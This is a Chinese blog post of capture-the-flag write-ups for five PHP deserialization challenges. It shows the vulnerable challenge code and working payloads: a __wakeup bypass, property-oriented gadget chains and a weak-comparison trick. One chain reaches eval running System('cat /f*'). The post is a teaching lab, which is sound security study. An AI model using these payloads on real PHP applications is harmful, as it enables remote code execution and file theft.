反序列化刷题/(ㄒoㄒ)/~~。

已于 2024-03-29 19:34:17 修改
阅读量806 收藏 10
点赞数 22
文章标签: 安全 php 经验分享 笔记
于 2024-03-29 19:32:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880442/article/details/136993972
版权

1.[SWPUCTF 2021 新生赛]ez_unserialize

 打开页面后什么都没有,先扫描目录

 可以看到扫描出了robots.txt,访问该文件。

 

 可以看到是回显出了一个php网页,再去访问。

 这个页面的话是给了一页代码。

 进行代码审计,

error_reporting(0); :关闭PHP错误报告。

how_source("cl45s.php"); :显示这个文件里面的内容。

然后class创建了一个类wllm,该类下面有admin,passwd两个公共属性,以及两个魔法函数construct和destruct。一个是初始化admin和passwd,另一个是对它两个的值进行判断,如果admin ===admin,passwd === ctf那么就会输出flag。我们可以通过实例化这个类,分别给admin和passwd赋值,然后使用序列化函数进行序列化操作,最后通过p参数进行上传访问。

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$a=new wllm();
$a->admin="admin";
$a->passwd="ctf";
$a=serialize($a);
echo $a;
?>

运行这串代码就会得到O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}这一串,然后传参就可以得到flag。

2.[SWPUCTF 2021 新生赛]no_wakeup

打开页面,再点击???就可以看到一页反序列化代码。

 代码审计,新建了HaHaHa这个类,类下面有admin,passwd两个属性,construct,wakeup,destruct三个魔术方法。

construct,构造函数,新建了admin和passwd;

wakeup,在反序列化之前会触发,如果它触发了就会把passwd加密,这个shal是加密函数且不可逆;很显然我们需要绕过wakeup,只用在序列化字符串中表示对象属性个数的值比真实的属性个数值大的时候,就会绕过wakeup魔术方法;

destruct,析构函数,有一个if判断语句,如果admin=admin,passwd=wllm,会输出flag。

构造代码:

​

 <?php
class HaHaHa{
        public $admin;
        public $passwd;
    }

$a=new HaHaHa;
$a->admin="admin";
$a->passwd="wllm";
$b=serialize($a);
echo $b;
?> 

[点击并拖拽以移动]
​

运行结果: O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

只用改成 O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}就可以把wakeup绕过。得到flag。

3.[SWPUCTF 2021 新生赛]pop

 点进去是一串代码,进行代码审计。

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

有三个类:w44m,w22m,w33m。

w44m下有一个私有变量admin和一个保护变量passwd,一个Getflag函数,该函数判断了如果admin='w44m',passwd='08067',那么就会输出flag。

w22m下有一个公有变量w00m,一个魔术方法destruct,该函数会在$一个类后,该对象销毁的时候触发,也可以在反序列化结束之后触发,因为反序列化得到的是一个对象,在之后对象会销毁,触发该函数,如果该函数触发,会输出w00m。

w33m下有两个公有变量:w00m和w222m。一个魔术方法toString,该魔术方法会在把对象当成字符串调用时触发。

构建代码:

 <?php

class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';        
    
}

class w22m{
    public $w00m;               
}

class w33m{
    public $w00m;
    public $w22m;
  
    }

$a = new w22m();
$b = new w33m();
$c = new w44m();
$a->w00m=$b;
$b->w00m=$c;
$b->w22m='Getflag';
$d=serialize($a);
echo $d;


?>

输出:

 这里要注意调用私有变量要加空格号,也就是%00;而保护变量要加%00*%00。

所有把它改为:

O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{s:11:"%00w44m%00admin";s:4:"w44m";s:9:"%00*%00passwd";s:5:"08067";}s:4:"w22m";s:7:"Getflag";}}

传参?w00m=就可以得到flag。

 解释一下代码的构造:

$a=new w22m;
$b=new w33m;
$c=new w44m;

实例化了三个对象:$a,$b,$c

$a->w00m=$b;把对象a里面的属性w00m变为对象b,也就是说对象a里面的w00m现在是一个对象,而魔术方法destruct触发后会echo $this->w00m,echo是输出函数,输出的是字符串,当echo输出w00m这个对象时(把对象当作字符串调用),就会触发toString这个魔术方法。

我们已经触发了toString这个魔术方法, 

public function __toString(){
        $this->w00m->{$this->w22m}();}

这个魔术方法在这里就会调用w00m,w22m。所有只用把w00m成为$c,把w22m成为函数Getflag,这个摩术方法实际上调用的就是getflag函数,就会输出flag,所有构建:

$b->w00m=$c;
$b->w22m='Getflag'

 最后再序列化$a就可以了。

4.[HUBUCTF 2022 新生赛]checkin

给了一串代码,进行代码审计

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

?>
username or password error!

if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;

如果满足弱比较的条件就会返回我们flag。当username=0或true,password=0或true时弱比较成立。

直接手写构建:a:2:{s:8:"username";b:1;s:8:"password";b:1;}

或a:2:{s:8:"username";i:0;s:8:"password";i:0;}

5. [NISACTF 2022]babyserialize

进行代码审计,

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

包含waf.php;

创建了四个类:NISA,TianXiWeiIlovetxwfour

NISA下有两个公有变量$fun和$txw4ever,其中$fun="show_me_flag"。有四个魔术方法wakeup,call,toString,invoke。其中wakeup下有hint函数,必须绕过该函数,弱比较类型,只用在构造代码时让fun=666,等任何数组就可以绕过,因为你在反序列化的时候你的值是可以控制的,相当于你给fun赋值为666了,理所当然的不能和fun的原值相等。

TianXiWei下有ext和x两个公有变量,有wakeup魔术方法。

Ilovetxw下有huang和su两个公有变量,call和toString两个魔术方法。

four下有a这个公有变量和fun私有变量,set魔术方法。

get传参ser。

先找危险函数,就是可以利用后输出flag的函数。可以找到@eval函数,参数是txw4ever,可以用System("cat /f*")命令来获取flag。因为它最后面的注释有正则匹配,我们就绕过一下。想要触发eval函数就必须先触发invoke魔术方法,invoke魔术方法的触发条件是把对象当成函数调用。

找到return $bb();然而$bb=$this->su,把su赋值给bb,这就有可乘之机了,只要给su赋值为对象,那么bb就会成为对象。如果su等于NISA,那么bb也会等于NISA,也就成为了一个对象。return $bb();这句代码就把对象当成函数调用了,就可以触发invoke魔术方法。

但前提条件是触发toString魔术方法,toString魔术方法的触发条件是把对象当成字符串调用。找到 strtolower函数,这个函数会把字符串转换成小写字母。

当a为一个对象的时候就会触发toString魔术方法,令a为Ilovetxw,就会触发该魔术方法;要触发 strtolower函数的话fun="sixsixsix",还要触发set魔术方法,它的触发条件是给不存在的成员属性赋值,把huang赋值为four,four中不含有fun,就会触发set魔术方法。最后要触发call魔术方法,该魔术方法在调用一个不存在的方法时会触发。wakeup魔术方法下面的ext赋值为Ilovetxw,触发call魔术方法,最后触发wakeup魔术方法

整理一下构造代码:

<?php
include "waf.php";
class NISA{
    public $fun="666";
    public $txw4ever='System("cat /f*");';
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun="sixsixsix";

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

$a=new NISA();
$b=new TianXiWei();
$c=new Ilovetxw();
$d=new four();
$c->su=$a;
$d->a=$c;
$c->huang=$d;
$b->ext=$c;
echo serialize($b)

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

输出为:

O:9:"TianXiWei":2:{s:3:"ext";O:8:"Ilovetxw":2:{s:5:"huang";O:4:"four":2:{s:1:"a";r:2;s:9:"%00four%00fun";s:9:"sixsixsix";}s:2:"su";O:4:"NISA":2:{s:3:"fun";s:3:"666";s:8:"txw4ever";s:18:"System("cat /f*");";}}s:1:"x";N;}

four中的fun是私有属性,记得加%00,当然你也可以把输出语句写成

echo urlencode(serialize($b));

编个码就不用改了。

提交看看,成功得到flag。

 这个题用到倒推法,非常实用,适用于许多类似的题。还有弱比较,正则匹配绕过。

蹦蹦炸弹芜湖
关注
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
php序列漏洞(万字详解)
2401_83947434的博客
04-12 744
序列是将对象或数组转为方便存储、传输的字符串,php使用serialize()函数将对象序列序列只作用于对象的成员属性,不序列成员方法;序列是将序列得到的字符串转为一个对象的过程;序列生成的对象的成员属性值由被序列的字符串决定,与原来类预定义的值无关;序列使用unserialize()函数将字符串转换为对象,序列使用serialize()函数将对象转为字符串;//序列phpclass tests:3:"666";s:1:"b";i:6666;}';
ISCC 2022 部分
BvxiE的博客
06-10 1312
这里写自定义目录标 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is_numeric(@$info["year"])?die("Sorry~"):NULL; if(@$info["year"]){ ($inf
[SWPUCTF 2021 新生赛]pop
qq_62046696的博客
05-20 1651
本来该期末考试了放弃看pop链表了,可是突然看着看着就通透了,那就赶紧记录下来,万一忘记了呢。 <?php error_reporting(0); show_source("index.php"); class w44m{ private $admin = 'aaa'; protected $passwd = '123456'; public function Getflag(){ if($this->admin === 'w44m' &amp
HUBUCTF 2022 新生赛-WEB部分wp
m0_74606212的博客
10-09 372
HUBUCTF 2022 新生赛-WEB部分wp
【Web】CTFSHOW 序列记录(上)
uuzeray的博客
02-26 1071
code在username和password拼接后是字母开头,弱比较就相当于0了,过不了if判断,也就走不到file_put_contents,我测,只能直接写webshell了。首先我们要访问一次index.php将limit,1写入session文件,然后修改cookie,再次访问index.php,这时候就成功将恶意序列数据写入了session文件。看到inc.php里设置了序列处理器为php,即用'|'识别,竖线以左代表session的key(键),竖线以右代表序列的字符串。
php json与xml序列/序列
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列序列。PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
Vbs序列/序列Json基类
02-13
Vbs序列/序列Json基类 可直接使用,bug已被我修复 Example: Dim fso, json, str, o, i Set json = New VbsJson Set fso = WScript.CreateObject("Scripting.Filesystemobject") str = fso.OpenTextFile(...
PHP多种序列/序列的方法详解
12-20
序列就是在适当的时候把这个字符串再转成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性.. 序列是将变量转换为可保存或传输的字符串的过程;序列就是在适当的时候把...
Visual C++中对象的序列与文件I/O研究
07-26
持久性和文件I/O是程序保持和记录数据的一种重要方法,这两种不同的处理方法虽然功能上有些接近但实现过程却大不相同。
2024年最新ctfshow python序列 记录(2)
最新发布
2401_84556837的博客
05-02 339
【代码】2024年最新ctfshow python序列 记录(2)
ctf php简单一般怎么,CTF最简单的Web
weixin_30991277的博客
04-01 697
http://www.shiyanbar.com/ctf/1810天网管理系统天网你敢来挑战嘛格式:ctf{ }解链接: http://ctf5.shiyanbar.com/10/web1查看源代码发现提示md5($test) = ‘0’百度0开头的md5值,随便拿一个带进username用就OK了。得到一个提示:/user.php?fame=hjkleffifer进入 http://ctf5...
CTF-web Xman-2018 第四天 WEB习1
iamsongyu的博客
12-11 1641
localhoost访问 更改x-forwarded-for=127.0.0.1   api调用  http://web.jarvisoj.com:9882/ 目录扫一下没什么特别的东西,看一下源码发现了关键代码 &lt;script&gt; function XHR() { var xhr; try {xhr = new XMLHttpReque...
[HUBUCTF 2022 新生赛]
zhhhb1005的博客
09-25 3158
这里卡在exp怎么写,后来详细了解了一下序列序列以后,再结合上面的isset( ),知道了username和password要用boolen类型,才写了出来。目是想让我们做数学,而且要速度介于1-3s之间,回答20个问即可给出flag。函数 ,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串。先对代码进行审计,发现isset( )是我们没见过的用法,可以去了解一下。,$_GET['id']是通过get方法传过来的值。如果$_GET['id']没有被设置,则。
攻防世界web进阶区记录(1)
bmth666的博客
03-27 4638
文章目录webbaby_webTraining-WWW-Robotsphp_rceWeb_php_include方法1方法2方法3warmupNewsCenter web baby_web 提示是:想想初始页面是哪个 进入是一个hello world,然后就没有了,由于提示试试抓包,得到flag Training-WWW-Robots 由于提示我们就查看robots.txt 获得flag p...
ctf中的一道序列
weixin_40709439的博客
09-27 5252
早就想写了,今天刚好遇到一道序列就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
网络安全实验室CTF练习部分目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
ctf php序列
06-07
CTF中的PHP序列攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP序列漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用序列功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值